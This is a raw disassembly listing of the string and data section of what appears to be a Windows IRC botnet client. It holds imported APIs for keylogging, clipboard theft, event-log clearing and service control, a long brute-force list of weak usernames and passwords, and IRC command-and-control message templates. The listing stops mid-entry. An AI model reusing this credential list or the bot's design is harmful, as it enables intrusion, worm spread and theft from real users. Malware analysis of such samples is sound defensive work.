aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_4012D6+921�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_4012D6+914�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_4012D6+90C�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_4012D6:loc_401BD5�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_4012D6+8D2�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4012D6+860�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4012D6+853�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_4012D6+846�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4012D6+839�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4012D6+82C�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_4012D6+81F�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_4012D6+812�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_4012D6+805�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_4012D6+7F8�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_4012D6+7F0�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4012D6:loc_401AB5�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_4012D6+6A6�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_4012D6+699�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_4012D6+68C�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_4012D6+67F�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_4012D6+672�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_4012D6+665�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_4012D6+658�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_4012D6+64B�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_4012D6+63E�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_4012D6+631�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_4012D6+629�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_4012D6+617�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_4012D6+60A�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_4012D6+5FD�o
align 4
; char aSend[]
aSend db 'send',0 ; DATA XREF: sub_4012D6+5F0�o
; sub_40274D+44AA�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_4012D6+5E3�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_4012D6+5D6�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_4012D6+5C9�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_4012D6+5BC�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_4012D6+5AF�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_4012D6+5A2�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_4012D6+595�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_4012D6+588�o
aSocket db 'socket',0 ; DATA XREF: sub_4012D6+57B�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_4012D6+56E�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_4012D6+561�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_4012D6+554�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_4012D6+547�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_4012D6+53A�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_4012D6+52D�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_4012D6+525�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_4012D6+514�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_4012D6+4A1�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_4012D6+494�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_4012D6+487�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_4012D6+47A�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_4012D6+46D�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_4012D6+460�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_4012D6+453�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_4012D6+446�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_4012D6+43E�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_4012D6:loc_401703�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_4012D6:loc_4016DB�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_4012D6+3AD�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_4012D6+3A0�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_4012D6+393�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_4012D6+386�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_4012D6+379�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_4012D6+36C�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_4012D6+35F�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_4012D6:loc_40162D�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_4012D6+327�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_4012D6+31A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_4012D6:loc_4015E8�o
align 10h
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_4012D6+2C6�o
align 10h
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_4012D6+2B9�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_4012D6+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_4012D6+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_4012D6+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_4012D6+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_4012D6+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_4012D6+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_4012D6:loc_401535�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_4012D6+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_4012D6+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_4012D6+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_4012D6:loc_4014CE�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_4012D6+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_4012D6+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_4012D6+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_4012D6+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_4012D6+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_4012D6+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_4012D6+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_4012D6+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4012D6:loc_40140B�o
; ___crtMessageBoxA+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_4012D6:loc_4013DE�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_4012D6+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_4012D6+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_4012D6+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_4012D6+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_4012D6+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4012D6+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_4012D6+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_4012D6+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_4012D6+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_4012D6+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_4012D6+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4012D6+A�o
align 4
; char asc_42BF4C[]
asc_42BF4C db '-' ; DATA XREF: sub_401F92+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
; char aAvicap32_dllFa[]
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+2CC�o
align 4
; char aOdbc32_dllFail[]
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+298�o
; char aShell32_dllFai[]
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+264�o
align 4
; char aMpr32_dllFaile[]
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+230�o
align 4
; char aIphlpapi_dllFa[]
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_401F92+1FC�o
align 10h
; char aDnsapi_dllFail[]
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_401F92+1C8�o
; char aNetapi32_dllFa[]
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+194�o
align 4
; char aIcmp_dllFailed[]
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_401F92+160�o
align 4
; char aWininet_dllFai[]
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_401F92+12C�o
align 4
; char aWs2_32_dllFail[]
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+F8�o
; char aGdi32_dllFaile[]
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+C4�o
align 4
; char aAdvapi32_dllFa[]
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+90�o
align 4
; char aUser32_dllFail[]
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+5C�o
; char aKernel32_dllFa[]
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+28�o
align 4
; char a__0[]
a__0: ; DATA XREF: sub_410F37+155�o
; sub_412135+24C�o
unicode 0, <.>,0
unk_42C0DC db 2Dh ; - ; DATA XREF: sub_4022F5:loc_4023C2�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
; char asc_42C10C[]
asc_42C10C db '-' ; DATA XREF: sub_4022F5:loc_402393�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_42C13C db 2Dh ; - ; DATA XREF: sub_4022F5:loc_402349�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 10h
; char asc_42C160[]
asc_42C160 db '-' ; DATA XREF: sub_4022F5+44�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4023C9+41�o
; sub_40BBBA+38�o ...
aIntranet db 'intranet',0 ; DATA XREF: .data:0043C484�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:0043C47C�o
aMain db 'main',0 ; DATA XREF: .data:0043C478�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .data:0043C474�o
aBlank db 'blank',0 ; DATA XREF: .data:0043C470�o
align 10h
aOffice db 'office',0 ; DATA XREF: .data:0043C46C�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0043C468�o
aXp db 'xp',0 ; DATA XREF: .data:0043C464�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:0043C460�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:0043C45C�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .data:0043C458�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0043C454�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:0043C450�o
align 4
aCisco_0 db 'cisco',0 ; DATA XREF: .text:0040C81B�o
; .data:0043C44C�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: .data:0043C448�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0043C440�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0043C43C�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0043C438�o
; char aSa[]
aSa db 'sa',0 ; DATA XREF: sub_40274D+1A13�o
; .data:0043C434�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:0043C430�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0043C428�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0043C424�o
align 4
aData db 'data',0 ; DATA XREF: .data:0043C420�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0043C41C�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0043C418�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: .data:0043C414�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0043C410�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0043C408�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0043C404�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0043C400�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:0043C3FC�o
align 4
aHell db 'hell',0 ; DATA XREF: .data:0043C3F8�o
align 4
aGod db 'god',0 ; DATA XREF: .data:0043C3F4�o
aSex db 'sex',0 ; DATA XREF: .data:0043C3F0�o
; .data:off_4431D0�o
aSlut db 'slut',0 ; DATA XREF: .data:0043C3EC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0043C3E8�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0043C3E4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:0043C3E0�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .data:0043C3DC�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0043C3D8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0043C3D4�o
align 10h
; char aLogin[]
aLogin db 'login',0 ; DATA XREF: sub_40274D+9B8�o
; .data:0043C3D0�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0043C3CC�o
align 10h
aKatie db 'katie',0 ; DATA XREF: .data:0043C3C8�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0043C3C0�o
align 10h
aGeorge db 'george',0 ; DATA XREF: .data:0043C3BC�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0043C3B8�o
align 10h
aChris db 'chris',0 ; DATA XREF: .data:0043C3B4�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0043C3B0�o
aNeil db 'neil',0 ; DATA XREF: .data:0043C3AC�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0043C3A8�o
aBrian db 'brian',0 ; DATA XREF: .data:0043C3A4�o
align 10h
aSusan db 'susan',0 ; DATA XREF: .data:0043C39C�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:0043C398�o
aSam db 'sam',0 ; DATA XREF: .data:0043C394�o
aLuke db 'luke',0 ; DATA XREF: .data:0043C390�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0043C38C�o
; .data:0043C3A0�o
align 10h
aJohn db 'john',0 ; DATA XREF: .data:0043C388�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0043C384�o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:0043C380�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:0043C37C�o
align 10h
aJoe db 'joe',0 ; DATA XREF: .data:0043C378�o
aJen db 'jen',0 ; DATA XREF: .data:0043C374�o
aBob db 'bob',0 ; DATA XREF: .data:0043C370�o
; .data:0043C3C4�o
aQwe db 'qwe',0 ; DATA XREF: .data:0043C36C�o
aZxc db 'zxc',0 ; DATA XREF: .data:0043C368�o
aAsd db 'asd',0 ; DATA XREF: .data:0043C364�o
aQaz db 'qaz',0 ; DATA XREF: .data:0043C360�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0043C35C�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0043C358�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0043C354�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0043C350�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:0043C34C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0043C348�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0043C344�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:0043C340�o
aOem db 'oem',0 ; DATA XREF: .data:0043C33C�o
; char aUser_0[]
aUser_0 db 'user',0 ; DATA XREF: sub_40274D+4422�o
; .data:0043C338�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0043C334�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0043C330�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .data:0043C32C�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0043C328�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0043C324�o
; .data:0043C480�o
align 4
aWww db 'www',0 ; DATA XREF: .data:0043C320�o
aWeb db 'web',0 ; DATA XREF: .data:0043C31C�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0043C318�o
aMail db 'mail',0 ; DATA XREF: .data:0043C314�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0043C310�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:0043C30C�o
align 4
; char aServer_1[]
aServer_1 db 'server',0 ; DATA XREF: sub_40274D+3BA6�o
; .data:0043C304�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:0043C300�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0043C2F8�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0043C2F4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:0043C2F0�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0043C2EC�o
align 10h
aNone db 'none',0 ; DATA XREF: .data:0043C2E8�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0043C2E0�o
align 10h
a2004 db '2004',0 ; DATA XREF: .data:0043C2DC�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41D779+98�o
; .data:0043C2D8�o
align 10h
a2002 db '2002',0 ; DATA XREF: .data:0043C2D4�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0043C2D0�o
align 10h
a2000 db '2000',0 ; DATA XREF: .data:0043C2CC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0043C2C8�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:0043C2C4�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .data:0043C2C0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0043C2BC�o
a123456 db '123456',0 ; DATA XREF: .data:0043C2B8�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0043C2B4�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:0043C2B0�o
align 4
a123 db '123',0 ; DATA XREF: .data:0043C2AC�o
a12 db '12',0 ; DATA XREF: .data:0043C2A8�o
align 4
a1: ; DATA XREF: .data:0043C2A4�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:0043C2A0�o
aPwd db 'pwd',0 ; DATA XREF: .data:0043C29C�o
aPass_2 db 'pass',0 ; DATA XREF: .data:0043C298�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0043C294�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:0043C290�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0043C28C�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0043C288�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0043C284�o
aDb2 db 'db2',0 ; DATA XREF: .data:0043C260�o
; .data:0043C42C�o
aOracle db 'oracle',0 ; DATA XREF: .data:0043C25C�o
; .data:0043C444�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:0043C258�o
aDatabase db 'database',0 ; DATA XREF: .data:0043C254�o
; .data:0043C40C�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0043C250�o
; .data:0043C2FC�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:0043C24C�o
; .data:0043C2E4�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0043C248�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:0043C244�o
; .data:0043C48C�o
aStudent db 'student',0 ; DATA XREF: .data:0043C240�o
; .data:0043C488�o
aOwner db 'owner',0 ; DATA XREF: .data:0043C23C�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0043C238�o
align 4
aRoot db 'root',0 ; DATA XREF: .data:0043C234�o
; .data:0043C308�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0043C230�o
; .data:0043C490�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .data:0043C22C�o
; .data:0043C280�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:0043C228�o
; .data:0043C27C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0043C224�o
; .data:0043C278�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0043C220�o
; .data:0043C274�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .data:0043C21C�o
; .data:0043C270�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:off_43C218�o
; .data:0043C26C�o
align 10h
; a__p_a_w_a_a(*)
a__p_a_w_a_a__p db '..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a.',0
; DATA XREF: sub_40274D+3222�o
; sub_40274D+32F9�o ...
align 10h
a__p_a_w_a_a__0 db '..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a'
; DATA XREF: sub_40274D+35FB�o
; sub_40274D+3634�o ...
db '..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.'
db 'a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a'
db '.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.'
db 'a.a..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..',0
align 4
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043C16C�o
align 4
aMircV6_14Khale db 'mIRC v6.14 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043C168�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043C164�o
align 4
aMircV6_10Khale db 'mIRC v6.10 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_43C160�o
align 4
a@bxi_net db '*@bxi.net',0 ; DATA XREF: .data:off_43C15C�o
align 4
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_402472+61�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_402472+37�o
align 10h
; char asc_42C830[]
asc_42C830 db '-' ; DATA XREF: sub_4025EF+B5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 10h
; char aModeSS_0[]
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+7AE8�o
align 10h
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+7AD3�o
align 10h
; char asc_42C870[]
asc_42C870 db '-' ; DATA XREF: sub_40274D+7ABF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
unk_42C890 db 2Dh ; - ; DATA XREF: sub_40274D+7AA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPasswordAccept db 'Password accepted.',0
align 10h
unk_42C8B0 db 2Dh ; - ; DATA XREF: sub_40274D+7A50�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 4
; char aNoticeSHostAut[]
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40274D+7A2D�o
align 4
; char asc_42C904[]
asc_42C904 db '-' ; DATA XREF: sub_40274D+79E9�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 10h
; char aNoticeSYourAtt[]
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_40274D+79DA�o
; sub_40274D+7A41�o
align 4
; char aNoticeSPassAut[]
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40274D+79C6�o
align 4
; char asc_42C984[]
asc_42C984: ; DATA XREF: sub_40274D+799C�o
unicode 0, <~>,0
; char byte_42C988[]
byte_42C988 db 4 dup(0) ; DATA XREF: sub_40274D+7990�o
; sub_40E841+14�o
; char asc_42C98C[]
asc_42C98C db '-' ; DATA XREF: sub_40274D+7957�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 10h
; char asc_42C9B0[]
asc_42C9B0 db '-' ; DATA XREF: sub_40274D+78E6�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s seconds',0
align 4
; char asc_42C9D8[]
asc_42C9D8 db '-' ; DATA XREF: sub_40274D+78AC�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s ms',0
align 4
; char asc_42C9FC[]
asc_42C9FC db '-' ; DATA XREF: sub_40274D+7884�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 10h
; char asc_42CA20[]
asc_42CA20 db '-' ; DATA XREF: sub_40274D+785F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: ',27h,'%s',27h,'.',0
align 4
unk_42CA44 db 2Dh ; - ; DATA XREF: sub_40274D+7841�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 4
dword_42CA68 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_40274D+7827�o
dd 2E732520h, 0
; char asc_42CA84[]
asc_42CA84 db '-' ; DATA XREF: sub_40274D:loc_409F01�o
db 3, 34h, 2
